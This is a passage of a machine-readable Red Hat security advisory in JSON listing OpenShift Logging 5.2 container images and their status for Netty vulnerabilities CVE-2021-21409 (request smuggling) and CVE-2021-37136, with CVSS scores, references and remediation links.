"name": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-21409",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2021-03-30T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1944888"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Request smuggling via content-length header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21409"
},
{
"category": "external",
"summary": "RHBZ#1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21409"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32"
}
],
"release_date": "2021-03-30T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:38:45+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty: Request smuggling via content-length header"
},
{
"cve": "CVE-2021-37136",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
